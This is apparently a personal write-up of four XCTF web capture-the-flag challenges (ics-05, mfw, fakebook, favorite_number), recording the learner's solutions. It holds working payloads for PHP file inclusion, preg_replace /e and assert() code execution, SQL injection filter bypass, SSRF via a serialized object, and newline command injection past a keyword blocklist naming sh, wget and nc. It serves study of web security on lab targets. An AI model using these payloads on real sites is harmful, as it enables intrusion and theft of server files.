XCTF Web Record (Day 4, Day 5)

ics-05

Title description: Other saboteurs will use the back door of the industrial cloud management system equipment maintenance center to invade the system

So after opening it, click directly on the equipment maintenance center to view the source code of the webpage:

a suspicious point was found.

Try to read the source code of index.php using pseudo-protocol:

?page=php://filter/read=convert.base64-encode/resource=index.php

Get the source code of base64 encryption and decode it (key part):

<?php

$page = $_GET[page];

if (isset($page)) {
    
    



if (ctype_alnum($page)) {
    
    
?>



<?php

}else{
    
    

?>

                <?php

                if (strpos($page, 'input') > 0) {
    
    
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
    
    
                    die();
                }

                if (strpos($page, 'text') > 0) {
    
    
                    die();
                }

                if ($page === 'index.php') {
    
    
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
   

<?php
}}


//方便的实现输入输出的功能,正在开发中的功能，只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
    
    

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
    
    
        preg_replace($pattern, $replacement, $subject);
    }else{
    
    
        die();
    }

}





?>

Note that the X_FORWARDED_FOR header is forged here, the packet is captured, and the header is added:

Then use the vulnerability of the preg_replace() function. When using /e, preg_replace() treats the replacement parameter as PHP code.

Try to construct the payload:

?pat=/123/e&rep=system('ls')&sub=1234

?pat=/123/e&rep=system("cd%20s3chahahaDir%26%26%20ls")&sub=1234
// %26表示&

?pat=/123/e&rep=system("cd%20s3chahahaDir/flag%26%26%20ls")&sub=1234

?pat=/123/e&rep=system("cat%20s3chahahaDir/flag/flag.php")&sub=1234

mfw

Open the page, there is an about page:

there may be a source code leak.

Use GitHack to download its source code:

there is a flag.php, and there is no useful information to open it.

Open index.php and get:

<?php

if (isset($_GET['page'])) {
    
    
        $page = $_GET['page'];
} else {
    
    
        $page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

?>

Found the point of use of this problem.

The strpos() function finds the position of the first occurrence of a string in another string.
$file is obtained by splicing.
assert() checks whether an assertion is FALSE.
assert() will execute the characters in the brackets as code and return true or false.

There is no filtering here, construct the payload:

'.system("cat ./templates/flag.php").'
1') or system('cat templates/flag.php');//

fakebook

View the source code:

input a, an error is reported, there is SQL injection:

normal operation, it is judged that there are 4 columns.

Using joint injection, it is found that there is filtering:

?no=-1 union select 1,2,3,4#

That can only be a problem in union select, try to bypass it, and find that it can be used:

?no=-1 union/**/select 1,2,3,4#

Then operate normally without recording anymore.

Finally got the result:

the things that have been serialized, it is found that the content is actually the content we registered (I scribbled when I registered here).

Think about checking robots.txt, and I got something:

source code leaked. . . .

<?php


class UserInfo
{
    
    
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
    
    
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
    
    
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
    
    
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
    
    
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
    
    
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

Analyze the code well and think about how to use it.

It seems that the blog has been processed.

The registered information is serialized for storage.

We also know the absolute path: /var/www/html/.

flag.php is under this path.

We can use the sql function to read directly:

?no=100 union/**/select 1,load_file('/var/www/html/flag.php'),3,4 #

The test site here is actually SSRF. I don’t know the specifics very well. The structure:

?no=-1 union/**/select 1,2,3,‘O:8:“UserInfo”:3:{s:4:“name”;s:1:“1”;s:3:“age”;i:1;s:4:“blog”;s:29:“file:///var/www/html/flag.php”;}’

Let's stop here for enen's question first, and learn more about it later.

Cat

Stupid one!

Cat

favorite_number

A code audit question

 <?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
    
    
    $num= $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
    
    
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
    
    
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
    
    
            echo 'Bonjour!';
        }
    }
} else {
    
    
    highlight_file(__FILE__);
} 

There are several places that need to be bypassed, analyze them one by one:

if($stuff === $array && $stuff[0] != 'admin')

$stuff is strongly equal to the array $array, and the first element is not equal to admin.

Here is a prompt for php 5.5.9, check the bypass method:

The general meaning is:

In the array,a[0]===a[0x1000000000] // bool(true)

So construct the payload:

stuff[4294967296]=admin&stuff[1]=user&num=111 

Get: The

first bypass is successful.

Next to bypass the regular:

if (preg_match("/^\d+$/im",$num)){
    
    
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num))

The requirement is a number and cannot have some characters.

There is no newline matching here, so we can use %0a to wrap and bypass the first regular:

stuff[4294967296]=admin&stuff[1]=user&num=111%0a ls /

The hackbar seems to be useless here.

Learned the new posture here, using the index method:

stuff[4294967296]=admin&stuff[1]=user&num=111%0a ls -i /

Backquote to execute read content:

stuff[4294967296]=admin&stuff[1]=user&num=111%0a more `find / -inum 31458297`

Summarize this question:

Examined the key overflow problem
and learned the new posture of reading files

postscript:

I only recorded one question today, because the latter questions became difficult for me, so I recorded one question every day, understand each question, understand the questions recorded before, and review it.